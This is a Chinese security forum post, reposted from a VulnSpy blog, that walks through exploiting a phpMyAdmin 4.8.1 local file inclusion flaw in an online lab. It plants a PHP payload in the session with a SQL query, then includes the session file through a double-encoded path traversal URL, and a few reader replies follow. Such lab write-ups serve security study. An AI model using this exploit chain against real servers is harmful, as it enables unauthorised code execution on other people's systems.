用户
搜索

该用户从未签到

i春秋-脚本小子

Rank: 2

5

主题

12

帖子

77

魔法币
收听
0
粉丝
0
注册时间
2017-11-26
发表于 2018-6-21 10:50:41 39607

今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。

在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞的利用。

VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.com/phpmyadmin-4.8.1/

漏洞细节

参照ChaMd5安全团队发布的文章:phpmyadmin4.8.1后台getshell

漏洞利用

因为原文中包含数据库文件可能由于文件权限或者帐号权限不足而无法利用,这里我们将使用另外一种方式来利用该文件包含漏洞,即包含session文件。

1. 进入VulnSpy [在线 phpMyAdmin 环境地址]((http://www.vulnspy.com/phpmyadmin-4.8.1/),点击 Start to Hack ,跳转到VSPlate

vulnspy

2. 等待载入设置后,点击 GO 按钮开启实验

vulnspy

3. 实验创建完成后,点击演示地址进入实验

vulnspy

4. 使用帐号 root ,密码 toor 登录 phpMyAdmin

vulnspy

5. 点击顶部导航栏中的SQL按钮,执行SQL查询

select '<?php phpinfo();exit;?>'

vulnspy

6. 获取自己的SESSION ID

你的 SESSION ID 为 Cookie 中的 phpMyAdmin 项。

vulnspy

这样对应的SESSION文件为/var/lib/php/sessions/sess_你的SESSION ID

7. 包含SESSION文件,成功利用该漏洞

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

vulnspy

本文转载自:phpMyAdmin 4.8.x LFI Exploit - http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/

我看了一下4.4.15版本,但是在58行下多了一句
&& in_array($_REQUEST['target'], $goto_whitelist)
研究了一上午绕不过,还请指教
使用道具 举报 回复
playwindc 发表于 2018-6-23 13:01
我看了一下4.4.15版本,但是在58行下多了一句
&& in_array($_REQUEST['target'], $goto_whitelist)
研究了 ...

只针对4.8的版本
使用道具 举报 回复
发表于 2018-6-25 18:20:04
使用道具 举报 回复
发新帖
您需要登录后才可以回帖 登录 | 立即注册